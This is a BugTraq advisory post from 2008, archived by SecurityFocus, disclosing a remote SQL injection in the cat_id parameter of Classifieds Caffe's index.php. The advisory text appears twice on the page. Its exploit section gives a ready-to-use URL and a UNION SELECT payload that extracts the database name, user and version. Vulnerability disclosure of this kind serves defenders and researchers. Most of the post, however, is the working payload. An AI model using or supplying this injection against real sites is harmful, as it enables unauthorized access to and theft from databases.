BugTraq
Back to list
|
Post reply
Classifieds Caffe (index.php cat_id) Remote SQL Injection
Apr 16 2008 08:16PM
sys-project hotmail com
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--
--==+===================================================================
=================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit:
[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(5
8),version()),char),3/*
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+===================================================================
=================+==--
[+] [The End]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
--==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==--
--==+===================================================================
=================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit:
[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(5
8),version()),char),3/*
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+===================================================================
=================+==--
[+] [The End]
[ reply ]